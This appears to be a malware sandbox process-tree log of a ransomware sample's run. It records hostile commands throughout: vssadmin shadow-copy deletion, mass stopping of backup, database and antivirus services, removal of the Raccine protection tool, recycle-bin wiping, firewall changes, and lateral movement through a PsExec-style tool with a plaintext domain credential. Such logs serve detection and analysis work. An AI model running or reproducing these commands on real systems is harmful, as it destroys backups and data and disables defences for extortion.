- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4116
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5536
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:5644
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  PID:4840
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:5668
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5632
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5512
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:3968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:5180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:4580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:6956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5444
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6024
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5808
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5736
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4212
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:5096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:1484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:1128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.41 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:6364
- C:\Users\Admin\AppData\Local\Temp\13xoccyw.exe
  "C:\Users\Admin\AppData\Local\Temp\13xoccyw.exe" \10.10.0.41 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
  2⤵
  PID:6852
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:6384
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:6200
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:6484
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:7136
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
  2⤵
  PID:5060
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:5748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:5708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:4916
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
  2⤵
  PID:4532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:6436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:6852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:4772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:4628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:5368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:6292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:6980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:6364

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5320

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:4500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:5956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:5696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:5636

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:5104
- C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
  "2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
  2⤵
  PID:1488
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:6216
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5916
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:5372
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:4728
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4928
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:7036
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:7084
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:6148
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4684
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:6880
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:252
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:4652
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:6320
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:284
- - C:\Windows\system32\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:6684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:5220
- - C:\Windows\system32\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:6308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:4144
- - C:\Windows\system32\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:6560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start Dnscache /y
      4⤵
      PID:3484
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:6596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:6152
- - C:\Windows\system32\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:6592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:5444
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6796
- - C:\Windows\system32\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:4224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:6176
- - C:\Windows\system32\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:6160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:5168
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:5328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:1484
- - C:\Windows\system32\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:6260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:2920
- - C:\Windows\system32\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:5960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:4748
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:5972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:5432
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:1396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:4708
- - C:\Windows\system32\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:4256
- - C:\Windows\system32\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:5604
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:1004
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:3308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:2492
- - C:\Windows\system32\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:3932
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:4020
- - C:\Windows\system32\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:5164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:2368
- - C:\Windows\system32\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:5252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:4988
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:4112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:3016
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:4892
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:5620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:6112
- - C:\Windows\system32\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:4188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:4408
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:6332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:4600
- - C:\Windows\system32\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:4828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:4396
- - C:\Windows\system32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:5204
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:5436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:4276
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:5724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:3812
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:6996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:4456
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:6100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:3616
- - C:\Windows\system32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:4764
- - C:\Windows\system32\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:1908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:7016
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:5544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:3456
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:1508
- - C:\Windows\system32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:5796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:2000
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:5612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:6932
- - C:\Windows\system32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:6856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:5812
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:6072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:6196
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:5996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:5112
- - C:\Windows\system32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:5104
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:5356
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:4932
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:6988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:6460
- - C:\Windows\system32\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:2256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:4908
- - C:\Windows\system32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:6208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:6504
- - C:\Windows\system32\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:4984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:4864
- - C:\Windows\system32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:6520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:5052
- - C:\Windows\system32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:6344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:6888
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:5976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:4720
- - C:\Windows\system32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:5456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:6036
- - C:\Windows\system32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:6904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:7092
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:6380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:276
- - C:\Windows\system32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:2676
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:6516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:6212
- - C:\Windows\system32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:1728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:1216
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:4148
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:6000
- - C:\Windows\system32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:6016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:5644
- - C:\Windows\system32\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:5736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop macmnsvc /y
      4⤵
      PID:1580
- - C:\Windows\system32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:5732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:6320
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:5096
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:4684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:392
- - C:\Windows\system32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:4652
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:4344
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:5176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:6464
- - C:\Windows\system32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:4656
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:4508
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:3276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:6992
- - C:\Windows\system32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:3404
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1004
- - C:\Windows\system32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:5532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:5216
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:4880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:196
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:3728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamMountSvc /y
      4⤵
      PID:2388
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:5912
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:6056
- - C:\Windows\system32\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:6020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:4988
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:6104
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:4964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:1220
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:2620
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:3992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:5244
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:2900
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:5084
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:4796
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:5564
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:4600
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:4348
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:4432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:2680
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:2612
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:4944
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:2424
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:4404
- - C:\Windows\system32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:4380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:5508
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:4716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:4452
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:1748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:5672
- - C:\Windows\system32\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:7016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBAMService /y
      4⤵
      PID:4524
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:5768
- - C:\Windows\system32\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:4416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:1256
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:1252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:4632
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:6672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:6384
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:6952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:6128
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:2056
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:5904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:4816
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:5988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:5368
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:6432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5576
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:5416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:5380
- - C:\Windows\system32\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:4248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:6248
- - C:\Windows\system32\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:7080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
